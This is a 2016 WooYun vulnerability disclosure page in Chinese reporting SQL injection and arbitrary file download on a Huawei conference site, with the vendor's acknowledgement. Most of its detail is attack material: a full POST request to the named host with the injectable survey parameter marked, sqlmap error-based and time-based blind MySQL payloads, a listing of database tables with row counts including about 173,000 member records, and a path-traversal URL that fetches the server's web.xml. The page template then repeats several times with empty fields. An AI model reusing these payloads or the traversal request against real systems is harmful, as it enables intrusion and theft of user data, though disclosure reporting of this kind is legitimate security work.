华为某站存在SQL注入(17w用户)&任意文件下载

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0205773

漏洞标题：华为某站存在SQL注入(17w用户)&任意文件下载

漏洞作者：紫霞仙子

提交时间：2016-05-06 20:16

修复时间：2016-06-23 09:40

公开时间：2016-06-23 09:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-06：细节已通知厂商并且等待厂商处理中
2016-05-09：厂商已经确认，细节仅向厂商公开
2016-05-19：细节向核心白帽子及相关领域专家公开
2016-05-29：细节向普通白帽子公开
2016-06-08：细节向实习白帽子公开
2016-06-23：细节向公众公开

简要描述：

我的辣条呢？

详细说明：

POST /web/member/memberSurveyAction!answerQuestion.do HTTP/1.1
Content-Length: 2916
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: www.huaweihcc.com
Cookie: JSESSIONID=ADEB3C74B5159E2AC9A0AB6AC0C1050C-n1.jvm1; pvndwvyk=1
Host: www.huaweihcc.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
answerList%5b0%5d.optionId=98&answerList%5b0%5d.optionValue=1&answerList%5b0%5d.otherOptionId=105&answerList%5b0%5d.questionId=13&answerList%5b0%5d.surveyId=2&answerList%5b1%5d.optionId=106&answerList%5b1%5d.optionValue=1&answerList%5b1%5d.otherOptionId=128&answerList%5b1%5d.questionId=14&answerList%5b1%5d.surveyId=2&answerList%5b2%5d.optionId=135&answerList%5b2%5d.questionId=15&answerList%5b2%5d.surveyId=2&answerList%5b3%5d.optionId=129&answerList%5b3%5d.optionValue=*&answerList%5b3%5d.otherOptionId=134&answerList%5b3%5d.questionId=16&answerList%5b3%5d.surveyId=2&answerList%5b4%5d.checkBoxOptionId=146&answerList%5b4%5d.checkBoxOptionId=150&answerList%5b4%5d.checkBoxOptionId=151&answerList%5b4%5d.checkBoxOptionId=143&answerList%5b4%5d.checkBoxOptionId=142&answerList%5b4%5d.checkBoxOptionId=145&answerList%5b4%5d.checkBoxOptionId=144&answerList%5b4%5d.checkBoxOptionId=149&answerList%5b4%5d.checkBoxOptionId=155&answerList%5b4%5d.checkBoxOptionId=154&answerList%5b4%5d.checkBoxOptionId=148&answerList%5b4%5d.checkBoxOptionId=152&answerList%5b4%5d.checkBoxOptionId=153&answerList%5b4%5d.checkBoxOptionId=147&answerList%5b4%5d.checkBoxOptionId=139&answerList%5b4%5d.checkBoxOptionId=140&answerList%5b4%5d.checkBoxOptionId=141&answerList%5b4%5d.optionValue=1&answerList%5b4%5d.otherOptionId=155&answerList%5b4%5d.questionId=17&answerList%5b4%5d.surveyId=2&answerList%5b5%5d.optionId=156&answerList%5b5%5d.questionId=18&answerList%5b5%5d.surveyId=2&answerList%5b6%5d.checkBoxOptionId=165&answerList%5b6%5d.checkBoxOptionId=164&answerList%5b6%5d.checkBoxOptionId=166&answerList%5b6%5d.checkBoxOptionId=171&answerList%5b6%5d.checkBoxOptionId=172&answerList%5b6%5d.checkBoxOptionId=173&answerList%5b6%5d.checkBoxOptionId=170&answerList%5b6%5d.checkBoxOptionId=167&answerList%5b6%5d.checkBoxOptionId=168&answerList%5b6%5d.checkBoxOptionId=169&answerList%5b6%5d.optionValue=1&answerList%5b6%5d.otherOptionId=173&answerList%5b6%5d.questionId=19&answerList%5b6%5d.surveyId=2&answerList%5b7%5d.optionId=174&answerList%5b7%5d.questionId=20&answerList%5b7%5d.surveyId=2&answerList%5b8%5d.checkBoxOptionId=178&answerList%5b8%5d.checkBoxOptionId=179&answerList%5b8%5d.checkBoxOptionId=176&answerList%5b8%5d.checkBoxOptionId=177&answerList%5b8%5d.checkBoxOptionId=181&answerList%5b8%5d.checkBoxOptionId=180&answerList%5b8%5d.optionValue=1&answerList%5b8%5d.otherOptionId=181&answerList%5b8%5d.questionId=21&answerList%5b8%5d.surveyId=2&answerList%5b9%5d.optionId=182&answerList%5b9%5d.questionId=22&answerList%5b9%5d.surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&surveyMember.memberEmail=sample%40email.tst&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F

漏洞证明：

---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND (SELECT 6810 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(6810=6810,1))),0x716b787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pesh'='Pesh&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&surveyMember.memberEmail=sample@email.tst&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: answerList[0].optionId=98&answerList[0].optionValue=1&answerList[0].otherOptionId=105&answerList[0].questionId=13&answerList[0].surveyId=2&answerList[1].optionId=106&answerList[1].optionValue=1&answerList[1].otherOptionId=128&answerList[1].questionId=14&answerList[1].surveyId=2&answerList[2].optionId=135&answerList[2].questionId=15&answerList[2].surveyId=2&answerList[3].optionId=129&answerList[3].optionValue=' AND (SELECT * FROM (SELECT(SLEEP(5)))xisD) AND 'EqKa'='EqKa&answerList[3].otherOptionId=134&answerList[3].questionId=16&answerList[3].surveyId=2&answerList[4].checkBoxOptionId=146&answerList[4].checkBoxOptionId=150&answerList[4].checkBoxOptionId=151&answerList[4].checkBoxOptionId=143&answerList[4].checkBoxOptionId=142&answerList[4].checkBoxOptionId=145&answerList[4].checkBoxOptionId=144&answerList[4].checkBoxOptionId=149&answerList[4].checkBoxOptionId=155&answerList[4].checkBoxOptionId=154&answerList[4].checkBoxOptionId=148&answerList[4].checkBoxOptionId=152&answerList[4].checkBoxOptionId=153&answerList[4].checkBoxOptionId=147&answerList[4].checkBoxOptionId=139&answerList[4].checkBoxOptionId=140&answerList[4].checkBoxOptionId=141&answerList[4].optionValue=1&answerList[4].otherOptionId=155&answerList[4].questionId=17&answerList[4].surveyId=2&answerList[5].optionId=156&answerList[5].questionId=18&answerList[5].surveyId=2&answerList[6].checkBoxOptionId=165&answerList[6].checkBoxOptionId=164&answerList[6].checkBoxOptionId=166&answerList[6].checkBoxOptionId=171&answerList[6].checkBoxOptionId=172&answerList[6].checkBoxOptionId=173&answerList[6].checkBoxOptionId=170&answerList[6].checkBoxOptionId=167&answerList[6].checkBoxOptionId=168&answerList[6].checkBoxOptionId=169&answerList[6].optionValue=1&answerList[6].otherOptionId=173&answerList[6].questionId=19&answerList[6].surveyId=2&answerList[7].optionId=174&answerList[7].questionId=20&answerList[7].surveyId=2&answerList[8].checkBoxOptionId=178&answerList[8].checkBoxOptionId=179&answerList[8].checkBoxOptionId=176&answerList[8].checkBoxOptionId=177&answerList[8].checkBoxOptionId=181&answerList[8].checkBoxOptionId=180&answerList[8].optionValue=1&answerList[8].otherOptionId=181&answerList[8].questionId=21&answerList[8].surveyId=2&answerList[9].optionId=182&answerList[9].questionId=22&answerList[9].surveyId=2&siteId=5&struts.token.name=token&surveyMember.company=Baidua&surveyMember.country=AFG&surveyMember.genderCode=female&surveyMember.memberEmail=sample@email.tst&surveyMember.memberMobile=987-65-4329&surveyMember.memberName=gchifnyx&token=FF0W0EV4KWRB3I4X4DY61XQPYGPEOV7F
---
back-end DBMS: MySQL >= 5.0.0
Database: hcc
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| tb_em_answer                | 2001934 |
| hcc_member                  | 173091  |
| tb_em_survey_member         | 116952  |
| hcc_member_copy             | 51600   |
| hcc_member_bak_hcc2014      | 25989   |
| hcc_mdb_response            | 11508   |
| hcc_email_send_record       | 10383   |
| hcc_ticket                  | 9961    |
| hcc_email_send_record_copy  | 9024    |
| tb_app_business_log         | 4150    |
| hcc_bookagenda              | 2971    |
| hcc_test                    | 2130    |
| hcc_member_copy0503         | 1567    |
| hcc_invite                  | 1322    |
| tr_em_member_site           | 1248    |
| hcc_member_copy0426         | 1182    |
| tr_em_member_site_copy0426  | 998     |
| tr_em_member_site_copy0425  | 946     |
| hcc_webinar                 | 535     |
| hcc_order                   | 472     |
| hcc_agenda                  | 413     |
| hcc_agenda_20140916bak      | 413     |
| hcc_speaker                 | 247     |
| hcc_country                 | 241     |
| hcc_survey_result           | 220     |
| tb_em_option                | 185     |
| tb_app_element              | 126     |
| hcc_datum                   | 114     |
| hcc_picture                 | 91      |
| tr_app_role_menu_bakhcc2014 | 89      |
| hcc_resource_item           | 86      |
| hcc_sponsor                 | 66      |
| tb_app_menu_bakhcc2014      | 50      |
| tb_app_element_group        | 37      |
| hcc_cims_group              | 29      |
| hcc_media                   | 29      |
| hcc_article                 | 26      |
| hcc_datum_catetory          | 25      |
| hcc_email_template          | 24      |
| tb_em_question              | 22      |
| tr_app_role_menu            | 21      |
| hcc_conferenceroom          | 17      |
| tr_app_user_role            | 17      |
| tb_app_menu                 | 16      |
| tb_app_user                 | 15      |
| hcc_lab_content             | 11      |
| hcc_question_type           | 10      |
| hcc_resource                | 10      |
| hcc_survey_item             | 10      |
| hcc_survey_question         | 10      |
| tr_em_site_params           | 9       |
| tb_app_params               | 8       |
| tb_app_role                 | 8       |
| tb_em_site                  | 8       |
| tr_em_user_site             | 7       |
| hcc_global_survey           | 5       |
| tb_em_params                | 5       |
| hcc_lab_handbook            | 4       |
| hcc_member_topic            | 4       |
| hcc_lab_librarytype         | 2       |
| hcc_seq                     | 2       |
| tb_em_survey                | 2       |
| hcc_media_meterial          | 1       |
| hcc_survey                  | 1       |
| tb_app_organization         | 1       |
| tb_em_prizes                | 1       |
+-----------------------------+---------+

任意文件下载
www.huaweihcc.com/fileDownloadServlet?%20Enterprise%20Cloud%20Service_SAP_Open%20Version.pdf&fileName=../conf/web.xml&isFtp=1&sameName=1&selfilePath=europe/en/

修复方案：

版权声明：转载请注明来源紫霞仙子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-05-09 09:37

厂商回复：

感谢白帽子对华为公司安全的关注，我们已将该漏洞通知了业务部门整改。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0205773

漏洞标题：华为某站存在SQL注入(17w用户)&任意文件下载

相关厂商：华为技术有限公司

漏洞作者：紫霞仙子

提交时间：2016-05-06 20:16

修复时间：2016-06-23 09:40

公开时间：2016-06-23 09:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源紫霞仙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0205773

漏洞标题：华为某站存在SQL注入(17w用户)&任意文件下载

相关厂商：华为技术有限公司

漏洞作者： 紫霞仙子

提交时间：2016-05-06 20:16

修复时间：2016-06-23 09:40

公开时间：2016-06-23 09:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：16

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0205773"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：紫霞仙子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源紫霞仙子@乌云